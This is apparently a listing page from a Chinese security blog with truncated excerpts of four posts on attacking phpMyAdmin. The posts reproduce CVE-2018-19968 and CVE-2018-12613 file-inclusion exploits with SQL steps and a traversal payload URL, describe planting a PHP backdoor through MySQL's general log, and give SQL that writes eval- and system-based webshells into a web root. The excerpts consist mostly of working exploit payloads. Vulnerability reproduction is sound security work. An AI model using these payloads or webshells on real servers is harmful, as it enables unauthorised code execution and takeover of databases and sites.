2020-04-26 (CVE-2018-19968) phpmyadmin 文件包含复现 (CVE-2018-19968) phpmyadmin 文件包含复现 由于转换功能中出错,攻击者可以利用 phpMyAdmin 在 4.8.4 之前泄漏本地文件的内容。攻击者必须有权访问 phpMyAdmin 配置存储表,尽管这些表可以很容易地在攻击者有权访问的任何数据库中创建。攻击者必须具有有效的凭据才能登录到 phpMyAdmin;但是,攻击者必须拥有有效的凭据。此漏洞不允许攻击者绕过登录系统。影响版本phpmyadmin 4.8.0~4.8.3复现环境phpstudyphpMyAdmin4.8.1复现过程创建数据库,写入sessionCREATE DATABASE foo; CREATE TABLE foo.bar ( baz VARCHAR(100) PRIMARY KEY ); INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>'; 生成配置表http://192.168.2.1/phpmyadmin481/chk_rel.php?fixall_pmadb=1&db=foo 篡改pma_columninfo表INSERT INTO pma__column_info SELEC... K.Fire 2020-04-26 分享 178 阅读 0 评论 2020年04月26日 178 阅读 0 评论
2020-04-26 (CVE-2018-12613) phpmyadmin 文件包含复现 (CVE-2018-12613) phpmyadmin 文件包含复现 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。影响版本phpMyAdmin 4.8.0/4.8.1复现环境phpstudyphpMyAdmin4.8.1复现过程session文件写入phpinfo如图,即在tmp文件夹session文件中插入了phpinfo代码。包含文件Payloadhttp://192.168.2.1/phpmyadmin481/index.php?target=db_sql.php%253f/../../../../../phpstudy/PHPTutorial/tmp/tmp/sess_5mk01jm6mpq5114m9hrk53g0qhnkrrcq 复现截图 K.Fire 2020-04-26 分享 45 阅读 0 评论 2020年04月26日 45 阅读 0 评论
2018-06-17 phpmyadmin利用log日志文件插入一句话 phpmyadmin利用log日志文件插入一句话 返回错误 ‘The MySQL server is running with the --secure-file-priv option so it cannot execute this statement’,这是因为mysql对通过文件导入导出作了限制,默认不允许。默认value值为null,则为禁止,如果有文件夹目录,则只允许改目录下文件(测试子目录也不行)。shell写出过程 general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。 general log file 指的是日志的保存路径。 general_log 的作用:开启它可以记录用户输入的每条命令,会把其保存在E:\phpstudy\PHPTutorial\MySQL\data\下的一个log文件中。 利用思路:开启general_log之后把general_log_file的值修改为网站路径下一个自定义的php文件中,然后通过log日志写入一句话后门。 利用codeset global general_log = "O... K.Fire 2018-06-17 笔记 107 阅读 0 评论 2018年06月17日 107 阅读 0 评论
2016-04-10 phpmyadmin拿shell的四种经典方法 phpmyadmin拿shell的四种经典方法 方法一:CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL ); INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval_r($_POST[7on])?>'); SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php'; ----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php 一句话连接密码:7on方法二:读取文件内容: select load_file('E:/xamp/www/s.php'); 写一句话: select '<?php @eval_r($_POST[cmd])?>;'INTO OUTFILE 'E:/xamp/www/study.php' cmd执行权限: select ‘<?php echo \'<pre>\’;system($_GET[\’cmd\’]); echo \... K.Fire 2016-04-10 笔记 153 阅读 0 评论 2016年04月10日 153 阅读 0 评论